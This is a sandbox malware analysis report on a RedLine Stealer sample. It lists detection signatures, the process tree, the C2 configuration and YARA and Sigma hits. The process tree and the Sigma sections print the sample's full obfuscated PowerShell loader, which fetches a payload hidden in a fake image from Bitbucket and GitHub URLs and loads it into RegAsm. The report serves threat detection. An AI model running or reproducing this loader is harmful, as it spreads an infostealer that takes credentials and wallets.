Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sRMytgfRpJ.exe

Overview

General Information

Sample name:sRMytgfRpJ.exe
renamed because original name is a hash value
Original sample name:51c009abf871216f8d9e40cdd785ce6c.exe
Analysis ID:1519351
MD5:51c009abf871216f8d9e40cdd785ce6c
SHA1:54bb04f21150f5706a3171847d3de9851cafcccf
SHA256:9754bc10564077425803459cc91b0197ad96263e6994e9afc2a5fd0e932615d8
Tags:exeuser-abuse_ch
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected RedLine Stealer
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops certificate files (DER)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • sRMytgfRpJ.exe (PID: 7328 cmdline: "C:\Users\user\Desktop\sRMytgfRpJ.exe" MD5: 51C009ABF871216F8D9E40CDD785CE6C)
    • cmd.exe (PID: 7352 cmdline: cmd.exe /c fqt.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7428 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • powershell.exe (PID: 7476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#HM#a#Bp#GU#b#Bk#GE#Z#Bh#HM#LwBn#HM#Z#Bn#Gg#agBq#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#DU#MgBs#Gk#dw#v#HM#Z#Bh#G8#b#Bu#Hc#bwBk#C8#dwBx#HQ#cgBl#HQ#cgBl#C8#awBy#HU#cgBl#G0#b#B1#HI#LwBn#HI#bw#u#HQ#ZQBr#GM#dQBi#HQ#aQBi#C8#Lw#6#HM#c#B0#HQ#a##n#Cw#I##n#D##Jw#s#C##JwBT#HQ#YQBy#HQ#dQBw#E4#YQBt#GU#Jw#s#C##JwBS#GU#ZwBB#HM#bQ#n#Cw#I##n#D##Jw#p#Ck#fQB9##==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7664 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.52liw/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
            • RegAsm.exe (PID: 8044 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": "185.196.9.26:6302", "Bot Id": "@dxrkl0rd", "Authorization Header": "9c8dd7353be7ed4b6832da21d8d0d902"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000A.00000002.2070112434.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            Process Memory Space: powershell.exe PID: 7476JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              Process Memory Space: powershell.exe PID: 7476INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0x44ec6:$b2: ::FromBase64String(
              • 0x44cd7:$b3: ::UTF8.GetString(
              • 0x1a8b7:$s1: -join
              • 0x2a8b3:$s1: -join
              • 0x4aa16:$s3: reverse
              • 0x52180:$s3: reverse
              • 0x87500:$s3: reverse
              • 0x8e155:$s3: reverse
              • 0x9013c:$s3: reverse
              • 0x9b16b:$s3: reverse
              • 0xa31df:$s3: reverse
              • 0xa34cd:$s3: reverse
              • 0xa3be7:$s3: reverse
              • 0xa43a0:$s3: reverse
              • 0xab48b:$s3: reverse
              • 0xab8a5:$s3: reverse
              • 0xac42d:$s3: reverse
              • 0xad0da:$s3: reverse
              • 0xc6895:$s3: reverse
              • 0xd20d3:$s3: reverse
              • 0x1cbd4:$s4: +=
              Click to see the 5 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              10.2.RegAsm.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security

                Other

                SourceRuleDescriptionAuthorStrings
                amsi64_7664.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                  Sigma Signatures

                  Spreading

                  barindex
                  Sigma detected: Powershell download payload from hardcoded c2 list
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.52liw/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method

                  System Summary

                  barindex
                  Sigma detected: Base64 Encoded PowerShell Command Detected
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#HM#a#Bp#GU#b#Bk#GE#Z#Bh#HM#LwBn#HM#Z#Bn#Gg#agBq#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#Z
                  Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.52liw/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method
                  Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
